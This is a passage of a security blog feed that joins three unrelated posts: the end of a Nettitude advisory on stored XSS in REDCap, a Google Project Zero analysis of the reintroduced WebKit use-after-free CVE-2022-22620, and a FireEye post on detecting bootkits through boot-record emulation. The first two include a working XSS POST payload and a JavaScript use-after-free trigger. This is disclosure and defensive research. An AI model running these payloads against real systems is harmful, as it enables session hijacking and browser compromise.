In the project administration section of the application, admin users that have permissions to modify a project can modify the project title. The input field where this value is modified does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST Data sent to edit_project_settings.php:

surveys_enabled=1&repeatforms=0&scheduling=0&randomization=0&app_title=a%3C%2Ftitle%3E%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&purpose=0&project_pi_firstname=&project_pi_mi=&project_pi_lastname=&project_pi_email=&project_pi_alias=&project_irb_number=&purpose_other=&project_note=test&projecttype=on&repeatforms_chk=on&redcap_csrf_token=9158988d73045f982cb373f607a607022391e1df

Once the project title is modified, the user is returned to the project administration home page where the payload immediately triggers and will continue to be executed across all administration pages related to the project.

[Screenshot: payload executing on the project administration pages]

This code execution is triggered due to the project title being reflected in the page <title> tag. If a user enters a value which first closes the tag, then any further HTML or JavaScript can be executed as shown in the following screenshot.

[Screenshot: injected HTML and JavaScript executing after closing the title tag]

The impact of this vulnerability is reduced because it requires the attacker to have existing access as a user with project administration permissions. An attacker could potentially exploit this issue to redirect the user to a malicious website controlled by the attacker, which may ultimately lead to credential harvesting or the downloading of malware.

CVE-2022-24127 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: edit_project_settings.php
  • Vulnerable parameter: app_title

Conclusion

No area of a web application which accepts and stores user input should be trusted. Appropriate measures should be taken to sanitize or encode data before it is shown in a later browser response.
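As a generic illustration of that principle (a minimal Python sketch, not REDCap’s actual PHP-based remediation), HTML-encoding user input before it is reflected neutralises payloads like the one above:

import html

def render_title(user_supplied_title: str) -> str:
    # HTML-encode user input before embedding it in markup, so characters
    # like < > " ' cannot break out of the surrounding context.
    return "<title>{}</title>".format(html.escape(user_supplied_title, quote=True))

print(render_title('a</title><script>alert(document.location)</script>'))
# <title>a&lt;/title&gt;&lt;script&gt;alert(document.location)&lt;/script&gt;</title>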

Nettitude contacted Vanderbilt to disclose these vulnerabilities. Remediation was put in place almost immediately post-disclosure and a remediated version (12.0.13) was promptly released.


Timeline – CVE-2022-24004

  1. Discovered by Nettitude: 25 January 2022
  2. Vendor informed: 26 January 2022
  3. CVE Assigned: 26 January 2022
  4. Vendor fix released: 28 January 2022
  5. Nettitude Blog: 15 June 2022

Timeline – CVE-2022-24127

  1. Discovered by Nettitude: 28 January 2022
  2. Vendor informed: 28 January 2022
  3. Vendor fix released: 28 January 2022
  4. CVE assigned: 29 January 2022
  5. Nettitude Blog: 15 June 2022

 

The post CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting appeared first on Nettitude Labs.

An Autopsy on a Zombie In-the-Wild 0-day

14 June 2022 at 16:00

Posted by Maddie Stone, Google Project Zero

Whenever there’s a new in-the-wild 0-day disclosed, I’m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a “zombie” Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you’re interested in the full root cause analysis for CVE-2022-22620, we’ve published it here.

In the 2020 Year in Review of 0-days exploited in the wild, I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we’re seeing a similar trend. Attackers don’t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it’s a little bit different from other variants that we’ve discussed before. Most variants we’ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.

Getting Started

In the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: the patch (thanks to Apple for sharing with me!) and the description from the security bulletin stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue* to a reference-counted pointer, RefPtr<SerializedScriptValue>.

trunk/Source/WebCore/loader/FrameLoader.cpp (lines 1094–1096)

// This does the same kind of work that didOpenURL does, except it relies on the fact
// that a higher level already checked that the URLs match and the scrolling is the right thing to do.
- void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)
+ void FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)

Whenever I’m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There’s a lot of 0-days to be studied! 😀)

The Previous Life

In the case of CVE-2022-22620, I was scrolling through the git blame view of FrameLoader.cpp. Specifically I was looking at the definition of loadInSameDocument. When looking at the git blame for this line prior to our patch, it’s a very interesting commit. The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The Changelog even states:


(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the

serialized script value state object. No one was passing ownership.

But pass it along to statePopped as a Ref since we need to pass ownership

of the null value, at least for now.

Now I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a commit from 2013 that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled “Use-after-free in SerializedScriptValue::deserialize” and included a good description of how that use-after-free worked.

The commit also included a test:

Added a test that demonstrated a crash due to use-after-free

of SerializedScriptValue.

Test: fast/history/replacestate-nocrash.html

The trigger from this test is:

Object.prototype.__defineSetter__("foo",function(){history.replaceState("", "")});
history.replaceState({foo:1,zzz:"a".repeat(1<<22)}, "");
history.state.length;

My hope was that the test would crash the vulnerable version of WebKit and I’d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn’t crash.

The commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked the Blink rendering engine in April 2013.) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the Chromium bug back in 2013, so I asked him for the details.

The use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the "most recent" history entry.

The bug was that in the implementation of the getter for
state, SerializedScriptValue::deserialize was called on the current "most recent" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.

In order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>.  While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers’ fix also caught and patched the path to deserialize through loadInSameDocument.

The timeline of the changes impacting the stateObject is:

  • HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>
  • HistoryItem::stateObject() returns SerializedScriptValue*
  • FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*
  • HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>
  • HistoryItem::stateObject returns RefPtr instead of PassRefPtr
  • HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr
  • FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>

The Autopsy

When we look at the timeline of changes for FrameLoader::loadInSameDocument, it seems that the bug was re-introduced in December 2016 due to refactoring. The question is: why did the patch author think that loadInSameDocument would not need to hold a reference? From the December 2016 commit ChangeLog: “Take a raw pointer for the serialized script value state object. No one was passing ownership.”

My assessment is that it’s due to the October 2016 changes in HistoryItem:stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject() which as of October 2016 now passed a raw SerializedScriptValue* pointer. When looking at those two options for the type of an argument, then it’s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.

So why then was HistoryItem::stateObject’s return value changed from a RefPtr to a raw pointer in October 2016? That I’m struggling to find an explanation for.

According to the description, the patch in October 2016 was intended to “Replace all uses of ExceptionCodeWithMessage with WebCore::Exception”. However when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren’t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they’d do a little “clean-up” while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.

While the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn’t need to increase the reference count on the stateObject.

Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they’re related to lifetime semantics.

The Zombie

We’ve now tracked down the evolution of changes to fix the 2013 vulnerability…and then revert those fixes… so I got back to identifying the 2022 bug. It’s the same bug, but triggered through a different path. That’s why the 2013 test case wasn’t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:

  1. The 2013 test case triggers the bug through the V8History::stateAccessorAndGetter path instead of FrameLoader::loadInSameDocument, and
  2. As a part of Sergei’s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization. 

Therefore we needed to figure out how to call loadInSameDocument and instead of using the deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.

To quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument.

The tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. loadInSameDocument is responsible for scrolling to that location.

history.pushState("state1", "", location + "#foo");

history.pushState("state2", ""); // current state

history.back(); //goes back to state1, triggering loadInSameDocument

 

Now that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped (FrameLoader.cpp#1158):

m_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());

The callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the “freed” object was “used”.

If you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like CodeQL to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:

FrameLoader::loadInSameDocument
  FrameLoader::scrollToFragmentWithParentBoundary
    FrameView::scrollToFragment
      FrameView::scrollToFragmentInternal
        FocusController::setFocusedElement
          FocusController::setFocusedFrame
            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));

The blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we’re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.

The last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it’s therefore free’d. loadInSameDocument still uses the free’d stateObject in its call to statePopped.

input = document.body.appendChild(document.createElement("input"));
a = document.body.appendChild(document.createElement("a"));
a.id = "foo";
history.pushState("state1", "", location + "#foo");
history.pushState("state2", "");
setTimeout(() => {
        input.focus();
        input.onblur = () => history.replaceState("state3", "");
        setTimeout(() => history.back(), 1000);
}, 1000);

In both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.

Conclusion

Usually when we talk about variants, they exist due to incomplete patches: the vendor doesn’t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don’t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.

There’s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices:

  • Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.
  • Submitted a test case with the patch.
  • Detailed commit messages explaining the vulnerability and how they were fixing it.
  • Additional hardening measures during deserialization.

As an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, the fact that refactoring and security efforts are generally under-appreciated and under-rewarded, and a lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation.

While this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we’ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It’s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches.

BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)    Avg # Unique Boot Records (md5)
100-1000                     428
1000-10000                   4,738
10000+                       8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.
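To make the technique concrete, here is a minimal sketch (not FireEye’s actual implementation) of the partial MBR hash, assuming a 512-byte record already collected from disk; the offsets are taken directly from the formula above, and the file name is only an example:

    import hashlib

    def partial_mbr_hash(mbr: bytes) -> str:
        # Hash only the static code regions of a 512-byte MBR, skipping
        # bytes 218-223 (a region Windows may use for a disk timestamp)
        # and everything from offset 440 onward (disk signature and
        # partition table), which vary between otherwise identical records.
        return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()

    with open("mbr.bin", "rb") as f:          # a previously collected boot record
        print(partial_mbr_hash(f.read(512)))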

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.
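As an illustration of that first indicator, the comparison itself can be as simple as the hedged sketch below; the user-space read is standard Windows behaviour (and requires Administrator rights), while the low-level buffer would come from the private Raw Read driver, represented here only as a function argument:

    import hashlib

    def read_mbr_user_space(path=r"\\.\PhysicalDrive0", size=512) -> bytes:
        # This read traverses the full disk driver stack, so a malicious
        # filter driver (or user-space hook) can alter what we see.
        with open(path, "rb") as disk:
            return disk.read(size)

    def boot_record_hidden(user_view: bytes, low_level_view: bytes) -> bool:
        # low_level_view is assumed to come from the Raw Read driver, which
        # reads the same sector from the lowest driver in the stack.
        return hashlib.md5(user_view).digest() != hashlib.md5(low_level_view).digest()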

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.
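As a rough sketch of what this looks like with Unicorn’s Python bindings (our assumption of the setup; the production engine hooks many more event types and also services BIOS interrupts, which are omitted here):

    from unicorn import Uc, UC_ARCH_X86, UC_MODE_16, UC_HOOK_CODE

    BOOT_LOAD_ADDR = 0x7C00                       # the BIOS loads the MBR at 0000:7C00

    def emulate_boot_record(record: bytes, max_instructions=100_000):
        uc = Uc(UC_ARCH_X86, UC_MODE_16)
        uc.mem_map(0, 1024 * 1024)                # map the 1 MB real-mode address space
        uc.mem_write(BOOT_LOAD_ADDR, record)      # place the boot record where the BIOS would

        executed = []
        def on_code(uc, address, size, user_data):
            executed.append((address, size))      # record every instruction that runs
        uc.hook_add(UC_HOOK_CODE, on_code)

        uc.emu_start(BOOT_LOAD_ADDR, BOOT_LOAD_ADDR + len(record), count=max_instructions)
        return executed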

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reducing the time a human analyst must spend on follow-up analysis. An interesting quality of boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash that identifies duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing each assembly instruction as it executes to ultimately arrive at the “execution hash”.


Figure 2: Execution hash
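A hedged sketch of how such an execution hash could be computed, using Capstone to recover the mnemonic of each instruction from inside a Unicorn code hook (the concatenate-then-MD5 step is our reading of Figure 2, not FireEye’s exact algorithm):

    import hashlib
    from capstone import Cs, CS_ARCH_X86, CS_MODE_16

    md = Cs(CS_ARCH_X86, CS_MODE_16)
    mnemonics = []

    def on_code(uc, address, size, user_data):
        # Disassemble the instruction that is about to execute and keep its mnemonic.
        for insn in md.disasm(bytes(uc.mem_read(address, size)), address):
            mnemonics.append(insn.mnemonic)       # e.g. 'and', 'mov', 'shl', 'or'

    # register with uc.hook_add(UC_HOOK_CODE, on_code) before emu_start();
    # once emulation finishes, fold the whole run into a single hash:
    execution_hash = hashlib.md5("".join(mnemonics).encode()).hexdigest()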

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.
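In an emulation pipeline like the one above, this behavior can be flagged with a memory-write hook; the sketch below simply checks whether a write lands in the IVT or BDA ranges given in the text (the BDA length is assumed to be 256 bytes):

    from unicorn import UC_HOOK_MEM_WRITE

    IVT_START, IVT_END = 0x0000, 0x03FC           # interrupt vector table (0000:0000h-0000:03FCh)
    BDA_START, BDA_END = 0x0400, 0x04FF           # BIOS Data Area at 0040:0000h (assumed 256 bytes)

    suspicious_writes = []

    def on_mem_write(uc, access, address, size, value, user_data):
        if IVT_START <= address <= IVT_END:
            suspicious_writes.append(("possible IVT hook", hex(address), value))
        elif BDA_START <= address <= BDA_END:
            suspicious_writes.append(("possible BDA tampering", hex(address), value))

    # register with uc.hook_add(UC_HOOK_MEM_WRITE, on_mem_write)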

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.
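A minimal sketch of what such a submission Lambda could look like in Python with boto3; the bucket name, function name, and request format here are placeholders, not FireEye’s actual service:

    import json, hashlib, boto3

    s3 = boto3.client("s3")
    lam = boto3.client("lambda")
    BUCKET = "boot-records"                        # placeholder bucket name
    ANALYSIS_FUNCTION = "boot-record-analysis"     # placeholder analysis Lambda name

    def handler(event, context):
        record = bytes.fromhex(json.loads(event["body"])["boot_record_hex"])
        if len(record) % 512 != 0:                 # basic validation: whole sectors only
            return {"statusCode": 400, "body": "invalid boot record"}

        key = hashlib.sha256(record).hexdigest()
        s3.put_object(Bucket=BUCKET, Key=key, Body=record)       # store the raw bytes

        # fan out: invoke the analysis Lambda asynchronously for this record
        lam.invoke(FunctionName=ANALYSIS_FUNCTION,
                   InvocationType="Event",
                   Payload=json.dumps({"s3_key": key}))
        return {"statusCode": 202, "body": json.dumps({"id": key})}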

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage the in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into X15, our analysts can hunt through them at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads and writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.
